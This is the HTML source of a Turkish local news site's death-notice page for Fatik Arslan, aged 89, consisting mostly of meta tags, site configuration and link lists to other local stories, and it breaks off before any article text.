  <!DOCTYPE html>
<html lang="tr" class="sayfa-haber hs-rush no-inlinesvg site-center" itemscope itemtype="http://schema.org/NewsArticle">
  <head>
    <title>Fatik Arslan 89 yaşında</title>
<meta charset="utf-8">
<!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
<meta name="description" content="" />
<meta name="keywords" content="Fatik Arslan 89 yaşında" />
<meta name="news_keywords" content="Fatik Arslan 89 yaşında">
<meta name="author" content="Elbistanın Sesi" /><meta property="og:site_name" content="Elbistanın Sesi" />
<meta property="og:title" content="Fatik Arslan 89 yaşında" />
<meta property="og:description" content="" />
  <meta property="og:image" content="https://www.elbistaninsesi.com/images/haberler/2022/02/fatik_arslan_89_yasinda_h72918_c6a0d.jpg" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.elbistaninsesi.com/vefatlar/fatik-arslan-89-yasinda-h72918.html" /><meta http-equiv="refresh" content="3000" /><meta name="twitter:card" content="summary_large_image" />
<meta property="og:title" content="Fatik Arslan 89 yaşında" />
<meta name="twitter:url" content="http://www.elbistaninsesi.com/vefatlar/fatik-arslan-89-yasinda-h72918.html" />
<meta name="twitter:domain" content="https://www.elbistaninsesi.com/" />
<meta name="twitter:site" content="elbistaninsesi" />
<meta name="twitter:title" content="Fatik Arslan 89 yaşında" />
<meta name="twitter:description" content="" />
<meta name="twitter:image:src" content="https://www.elbistaninsesi.com/images/haberler/2022/02/fatik_arslan_89_yasinda_h72918_c6a0d.jpg" /><link rel="alternate" href="https://www.elbistaninsesi.com/vefatlar/fatik-arslan-89-yasinda-h72918.html" hreflang="tr" />

<link href='https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet"/>
<link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/renk.css" rel="stylesheet"/><link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print"/>
<link rel="alternate" type="application/rss+xml" title="RSS servisi" href="https://www.elbistaninsesi.com/rss.php" />
<link itemprop="mainEntityOfPage" rel="canonical" href="https://www.elbistaninsesi.com/vefatlar/fatik-arslan-89-yasinda-h72918.html">
<link rel="amphtml" href="https://www.elbistaninsesi.com/amp/vefatlar/fatik-arslan-89-yasinda-h72918.html">
  <link rel="image_src" type="image/jpeg" href="https://www.elbistaninsesi.com/images/haberler/2022/02/fatik_arslan_89_yasinda_h72918_c6a0d.jpg" />
<meta property="og:image:width" content="768"/>
<meta property="og:image:height" content="432"/>
<meta itemprop="headline" content="Fatik Arslan 89 yaşında" />
<meta itemprop="thumbnailUrl" content="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/fatik_arslan_89_yasinda_h72918_c6a0d.jpg" />
<meta itemprop="articleSection" content="Vefatlar" name="section" />
<meta itemprop="dateCreated" content="2022-02-19T13:15:55+02:00" />
<meta itemprop="dateModified" content="2022-02-19T13:19:14+02:00" /><meta itemprop="image" content="https://www.elbistaninsesi.com/images/haberler/2022/02/fatik_arslan_89_yasinda_h72918_c6a0d.jpg" />
<meta itemprop="genre" content="news" name="medium" />
<meta itemprop="inLanguage" content="tr-TR" />
<meta itemprop="keywords" content="Fatik Arslan 89 yaşında" name="keywords" />




<!--[if gte IE 9]>
<style type="text/css">.gradient {filter: none;}</style>
<![endif]-->
<!--[if IE 7]>
<style type="text/css">.reklam.dikey.sol .fixed{margin-left:-px;}</style>
<![endif]-->

<script type="text/javascript">
var site_url = 'https://www.elbistaninsesi.com/',
tema = 'hs-rush-php',
surum = '1.6.5',
sistem = '5.11',
theme_path = 'https://www.elbistaninsesi.com/_themes/hs-rush-php/',
ajax_url = '_ajax/',
cat_limit = '10',
headerayar = 'header_genis',
poll_voted = '',
comment_approved = '',
lazyload = '0',
twitter_user  = 'elbistaninsesi',
facebook_user = 'elbistaninsesi',
popup_saat = '1',
yorum_harf_ayar = '1',
iftara_kalan_sure = '0',
namaz_default = 'kahramanmaras',
uye_gir = 'Üye Girişi',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Facebook ile Bağlan',
analitik_ga = 'UA-21655627-1';
</script>

<style>
.dikeyhaberler .haber {
    width: 197px;
}
.dikeyhaberler .haber img {
    width: 200px;
    height: 120px;
}
.row-fluid [class*="span"]:first-child {
    margin-left: 0;
}
.dikeyhaberler .haber:last-child {
    margin-left: 15px;
}
#syazar {
    background-color: #EFEEEE;
}
</style>    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body class="hs-lch">

    
        
    
        
        <!-- HEADER -->
    <div id="siteHeader" class="header clearfix">
      <div id="header-top" class="header-top hs-bgc clearfix">
  <div class="header-top-container">

    
    

    <div class="header-top-block header-top-cycle">
            <div class="header-top-currency">
        <div class="currency-cycle">
          <div class="hs-bgc currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">13.65</span></div>
          <div class="hs-bgc currency-euro glyphicons white euro">EURO <span class="currency-rate">15.48</span></div>
          <div class="hs-bgc currency-altin glyphicons white coins">ALTIN <span class="currency-rate">832.47</span></div>
          <div class="hs-bgc currency-bist glyphicons white global">BIST <span class="currency-rate"></span></div>
        </div>
      </div>
      
      <div class="header-top-hot mleft">
        <div class="hot-cycle">
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/37-yasindaki-polis-memuru-gorevi-basinda-yasamini-yitirdi-h72917.html" title="37 yaşındaki polis memuru, görevi başında yaşamını yitirdi" >37 yaşındaki polis memuru, görevi başında yaşamını yitirdi</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/elbistanla-birlikte-osb-ges-yatirimlari-icin-yeni-guc-merkezi-h72914.html" title="Elbistan’la birlikte OSB, GES yatırımları için yeni güç merkezi geliyor" >Elbistan’la birlikte OSB, GES yatırımları için yeni güç merkezi...</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/23-kisinin-alinacagi-gecici-ise-775-basvuru-h72913.html" title="23 kişinin alınacağı geçici işe 775 başvuru!" >23 kişinin alınacağı geçici işe 775 başvuru!</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/cocuk-oyun-parkina-kimligi-belirsiz-kisilerce-zarar-verildi-h72912.html" title="Çocuk oyun parkına kimliği belirsiz kişilerce zarar verildi" >Çocuk oyun parkına kimliği belirsiz kişilerce zarar verildi</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/baskan-cay-taraftarimiz-ile-sahada-daha-guclu-olacagiz-h72911.html" title="Başkan Çay, “Taraftarımız ile sahada daha güçlü olacağız”" >Başkan Çay, “Taraftarımız ile sahada daha güçlü olacağız”</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/dernek-binasina-giren-yarali-puhu-dkmp-ekiplerine-teslim-edildi-h72910.html" title="Dernek binasına giren yaralı puhu, DKMP ekiplerine teslim edildi" >Dernek binasına giren yaralı puhu, DKMP ekiplerine teslim edildi</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/baskan-arslan-ankarayi-degil-beceriksizliklerinizi-konusun-h72909.html" title="Başkan Arslan: “Ankara’yı değil beceriksizliklerinizi konuşun”" >Başkan Arslan: “Ankara’yı değil beceriksizliklerinizi konuşun”</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/kaymakamliktan-universite-adaylarina-sinav-ucreti-destegi-h72908.html" title="Kaymakamlıktan üniversite adaylarına sınav ücreti desteği" >Kaymakamlıktan üniversite adaylarına sınav ücreti desteği</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/sozcudeki-iddialara-belediyeden-yanit-h72907.html" title="Sözcü’deki iddialara belediyeden yanıt" >Sözcü’deki iddialara belediyeden yanıt</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/uyusturucu-saticisi-tutuklandi-3-h72906.html" title="Uyuşturucu satıcısı tutuklandı" >Uyuşturucu satıcısı tutuklandı</a>
                </div>
                    </div>
      </div>
    </div>

    <div class="header-top-block header-top-right">
      <div class="header-top-user">

              <div class="btn-group">
                <button class="btn btn-user hs-bgco dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button>
                <ul id="memberArea" class="dropdown-menu hs-bgcd">
                </ul>
              </div>

      </div>
    </div>

      <div id="sb-search" class="header-top-block header-top-search sb-search">
            <form action="https://www.elbistaninsesi.com/" method="get">
              <input type="hidden" name="m" value="arama">


                            

              <input class="sb-search-input hs-bgcd" placeholder="Haber Ara ..." type="search" name="q" id="search">
              <input type="hidden" name="auth" value="bfde0c061c27805d163c501dc3faf730c793fd0c" />
              <input class="sb-search-submit" type="submit" value="">
              <span class="sb-icon-search hs-bgc"></span>
            </form>
          </div>
  </div>
</div>
      <div id="logo" class="container">
  <div class="row">
        <div class="span3">
              <span class="logo"><a href="https://www.elbistaninsesi.com/" class="logo"><img src="https://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Fatik Arslan 89 yaşında" /></a></span>
          </div>
    <div class="span9">
          </div>
      </div>
</div>

<div id="menu" class="clearfix">

  <div class="kategori">
    <div class="container">
      <a href="https://www.elbistaninsesi.com/" class="glyphicons home"></a>

      
      
            <a href="https://www.elbistaninsesi.com/yazarlar/" class="glyphicons parents">Yazarlar</a>
      
      

      
              <a title="Vefatlar" href="https://www.elbistaninsesi.com/vefatlar" id="k7" class="current"   >Vefatlar</a>
<a title="Güncel" href="https://www.elbistaninsesi.com/guncel" id="k8"    >Güncel</a>
<a title="Politika" href="https://www.elbistaninsesi.com/politika" id="k2"    >Politika</a>
<a title="Sağlık" href="https://www.elbistaninsesi.com/saglik" id="k4"    >Sağlık</a>
<a title="Eğitim / Kültür" href="https://www.elbistaninsesi.com/egitim-kultur" id="k5"    >Eğitim / Kültür</a>
<a title="Spor" href="https://www.elbistaninsesi.com/spor" id="k1"    >Spor</a>
<a title="Ekonomi" href="https://www.elbistaninsesi.com/ekonomi" id="k3"    >Ekonomi</a>
<a title="Arşiv Özel" href="https://www.elbistaninsesi.com/arsiv-ozel" id="k9"    >Arşiv Özel</a>
<a title="Seçim Sonucu" href="https://www.elbistaninsesi.com/secim-sonucu" id="k13"    >Seçim Sonucu</a>
<a title="YEREL" href="https://www.elbistaninsesi.com/yerel" id="k17"    >YEREL</a>
<div class="other pull-right"><a href="#" class="all glyphicons show_lines" title="Diğer Kategoriler"></a></div>      
      
      
    </div>
  </div>

  <div class="othercat right">
    <div class="container center">
              <a title="ASAYİŞ" href="https://www.elbistaninsesi.com/asayis" id="k19"    >ASAYİŞ</a>
<a title="KÜLTÜR-SANAT" href="https://www.elbistaninsesi.com/kultur-sanat" id="k20"    >KÜLTÜR-SANAT</a>
<a title="GENEL" href="https://www.elbistaninsesi.com/genel" id="k21"    >GENEL</a>
<a title="DÜNYA" href="https://www.elbistaninsesi.com/dunya" id="k22"    >DÜNYA</a>
<a title="EĞİTİM" href="https://www.elbistaninsesi.com/egitim" id="k48"    >EĞİTİM</a>
<a title="ÇEVRE" href="https://www.elbistaninsesi.com/cevre" id="k53"    >ÇEVRE</a>
<a title="MAGAZİN" href="https://www.elbistaninsesi.com/magazin" id="k60"    >MAGAZİN</a>
<a title="HABERDE İNSAN" href="https://www.elbistaninsesi.com/haberde-insan" id="k71"    >HABERDE İNSAN</a>
          </div>
  </div>

  
  <div id="katicerik" class="row-fluid">
    <div class="container"><div class="katelement kat_k7">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/fatik-arslan-89-yasinda-h72918.html" title="Fatik Arslan 89 yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/fatik_arslan_89_yasinda_h72918_c6a0d.jpg" alt="Fatik Arslan 89 yaşında" />
Fatik Arslan 89 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/anma-ozgur-yesilbas-h72916.html" title="Anma / Özgür Yeşilbaş"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/anma_ozgur_yesilbas_h72916_bdd4b.jpg" alt="Anma / Özgür Yeşilbaş" />
Anma / Özgür Yeşilbaş</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/mikdat-gunes-71-yasinda-h72915.html" title="Mikdat Güneş 71 yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/mikdat_gunes_71_yasinda_h72915_8c761.jpg" alt="Mikdat Güneş 71 yaşında" />
Mikdat Güneş 71 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/hasan-dogan-88-yasinda-h72903.html" title="Hasan Doğan 88 yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/hasan_dogan_88_yasinda_h72903_fbfcd.jpeg" alt="Hasan Doğan 88 yaşında" />
Hasan Doğan 88 yaşında</a>
</div>
</div></div><div class="katelement kat_k8">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/37-yasindaki-polis-memuru-gorevi-basinda-yasamini-yitirdi-h72917.html" title="37 yaşındaki polis memuru, görevi başında yaşamını yitirdi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/37_yasindaki_polis_memuru_gorevi_basinda_yasamini_yitirdi_h72917_d7106.jpg" alt="37 yaşındaki polis memuru, görevi başında yaşamını yitirdi" />
37 yaşındaki polis memuru, görevi başında yaşamını yitirdi</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/elbistanla-birlikte-osb-ges-yatirimlari-icin-yeni-guc-merkezi-h72914.html" title="Elbistan’la birlikte OSB, GES yatırımları için yeni güç merkezi geliyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/elbistanla_birlikte_osb_ges_yatirimlari_icin_yeni_guc_merkezi_geliyor_h72914_8636e.jpg" alt="Elbistan’la birlikte OSB, GES yatırımları için yeni güç merkezi geliyor" />
Elbistan’la birlikte OSB, GES yatırımları için yeni güç merkezi geliyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/23-kisinin-alinacagi-gecici-ise-775-basvuru-h72913.html" title="23 kişinin alınacağı geçici işe 775 başvuru!"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/23_kisinin_alinacagi_gecici_ise_775_basvuru_h72913_71d75.jpg" alt="23 kişinin alınacağı geçici işe 775 başvuru!" />
23 kişinin alınacağı geçici işe 775 başvuru!</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/cocuk-oyun-parkina-kimligi-belirsiz-kisilerce-zarar-verildi-h72912.html" title="Çocuk oyun parkına kimliği belirsiz kişilerce zarar verildi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/02/cocuk_oyun_parkina_kimligi_belirsiz_kisilerce_zarar_verildi_h72912_d70af.jpg" alt="Çocuk oyun parkına kimliği belirsiz kişilerce zarar verildi" />
Çocuk oyun parkına kimliği belirsiz kişilerce zarar verildi</a>
</div>
</div></div><div class="katelement kat_k2">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" />
İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" />
AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" />
Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" />
MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a>
</div>
</div></div><div class="katelement kat_k4">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" />
Crown Dental hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" />
Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" />
Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" />
EDH, obezite cerrahisinde söz sahibi olmaya başladı</a>
</div>
</div></div><div class="katelement kat_k5">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" />
Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" />
Otizmli çocuklar için özel etkinlik</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" />
Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" />
Nurhak Kaymakamlığı’ndan eğitime özel destek</a>
</div>
</div></div><div class="katelement kat_k1">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" />
Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" />
Filenin sultanları, Nevşehir’i ağırlayacak</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" />
PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" />
Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a>
</div>
</div></div><div class="katelement kat_k3">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" />
Mikrokredi desteği koronavirüs döneminde de devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" />
Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" />
ETSO ve TEB kredi protokolü imzaladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" />
DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a>
</div>
</div></div><div class="katelement kat_k9">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" />
17 EKİM 1968 PAZARTESİ</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" />
13 EKİM 1968 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" />
17 AĞUSTOS 1967 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" />
30 MAYIS 1959 CUMARTESİ</a>
</div>
</div></div><div class="katelement kat_k13">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" />
16 Nisan 2017 Anayasa Değişikliği Referandumu</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" />
1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" />
7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"></div></div><div class="katelement kat_k17">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" />
KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a>
</div>
